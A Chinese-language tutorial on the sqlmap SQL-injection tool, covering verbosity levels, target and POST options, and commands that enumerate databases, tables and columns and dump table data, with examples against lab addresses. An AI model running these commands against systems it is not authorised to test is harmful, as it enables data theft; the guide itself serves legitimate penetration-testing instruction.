您好,登錄后才能下訂單哦!
0x00 SQLMAP簡介
sqlmap是一種開源的***測試工具,可以自動檢測和利用SQL注入漏洞以及接入該數(shù)據(jù)庫的服務(wù)器。它擁有非常大的檢測引擎、具有多種特性的***實測器、通過數(shù)據(jù)庫指紋提取訪問底層文件系統(tǒng)并通過外帶連接執(zhí)行命令。
支持的數(shù)據(jù)庫:mysql,oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,IBM DB2,SQLite,Firebird,Sybase and SAP MaxDB
SQL注入技術(shù):錯誤注入,基于時間的錯誤注入,報錯注入,union注入
枚舉數(shù)據(jù):users,password hasher,privileges,roles,databases,tables and columns
0x01 Sqlmap掃描等級(共有7個等級,默認為1)
0、只顯示python錯誤以及嚴重的信息
1、同時顯示基本信息和警告信息。(默認)
2、同時顯示debug信息
3、同時顯示注入的payload
4、同時顯示HTTP請求
5、同時顯示HTTP響應(yīng)頭
6、同時顯示HTTP響應(yīng)面
0x02 獲取目標方式
參數(shù):-u 或 --url
eg:python sqlmap.py -u http(s)://targeturl[:port]/[...]
0x03 從文本中獲取多個目標掃描
參數(shù):-m
文件中保存url格式如下,sqlmap會一個一個檢測
www.target1.com/vuln1.php?q=foobar www.target2.com/vuln2.asp?id=1 www.target3.com/vuln3/id/1*
0x04 從文件中加載HTTP請求
參數(shù): -r
sqlmap可以從一個文本中獲取HTTP請求,這樣就可以跳過設(shè)置一些其他參數(shù)(比如cookie,POST數(shù)據(jù),等等)。
POST /vuln.php HTTP/1.1 Host: www.target.com User-Agent: Mozilla/4.0 id=1
0x05 POST方式注入
參數(shù): --data
此參數(shù)是吧數(shù)據(jù)以post方式提交,sqlmap會像檢測GET參數(shù)一樣檢測POST的參數(shù)。
eg:python sqlmap.py -u "http://www.target.com/vuln.php" --data="id=1"
0x06 設(shè)定超時時間
參數(shù): --timeout
可以設(shè)定一個HTTP(S)請求超過多久判定為超時,10.5表示10.5秒,默認是30秒。
0x07 設(shè)定重試超時
參數(shù): --retries
當HTTP(S)超時時,可以設(shè)定重新嘗試連接次數(shù),默認是3次
0x08 測試參數(shù)
*
在偽靜態(tài)注入測試時,sqlmap無法直接使用測試參數(shù),可以在想測試參數(shù)的參數(shù)后面加*
eg: 1.python sqlmap.py -u "http://targeturl/param1/value1*/param2/value2/" 2.python sqlmap.py -u "http://targeturl/param1/value1/param2/value2/15*"
0x09 列舉數(shù)據(jù)庫系統(tǒng)的數(shù)據(jù)庫
參數(shù):--dbs
當前用戶有權(quán)限讀取包含所有數(shù)據(jù)庫列表信息的表中的時候,即可列出所有的數(shù)據(jù)庫。
0x10 列舉數(shù)據(jù)庫表
參數(shù): --tables -D
列舉指定數(shù)據(jù)庫 -D xxxx 的所有表。如果不指定-D 則列舉所有數(shù)據(jù)庫中的所有表。
0x11 列舉書庫表中的字段
參數(shù):--columns -T -D
列舉指定數(shù)庫,指定表中的字段。
eg: python sqlmap.py -u "http://192.168.136.131/sqlmap/sqlite/get_int.php?id=1" --columns -D testdb -T users [...] Database: SQLite_masterdb Table: users [3 columns] +---------+---------+ | Column | Type | +---------+---------+ | id | INTEGER | | name | TEXT | | surname | TEXT | +---------+---------+
0x12 獲取表中數(shù)據(jù)個數(shù)
參數(shù): --count
列舉指定數(shù)據(jù)庫表中的數(shù)據(jù)個數(shù)。
eg: python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --count -D testdb [...] Database: testdb +----------------+---------+ | Table | Entries | +----------------+---------+ | dbo.users | 4 | | dbo.users_blob | 2 | +----------------+---------+
0x13 獲取整個表的數(shù)據(jù)或某幾個字段的數(shù)據(jù)。
--dump -D -T -C
列舉某個數(shù)據(jù)庫某個表的所有字段
python sqlmap.py -u http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1 --dump -D testdb -T dbo.users
列舉某個數(shù)據(jù)庫的某個表的某個字段的數(shù)據(jù)。
python sqlmap.py -u http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1 --dump -D testdb -T dbo.users -C ID,NAME
免責聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關(guān)證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權(quán)內(nèi)容。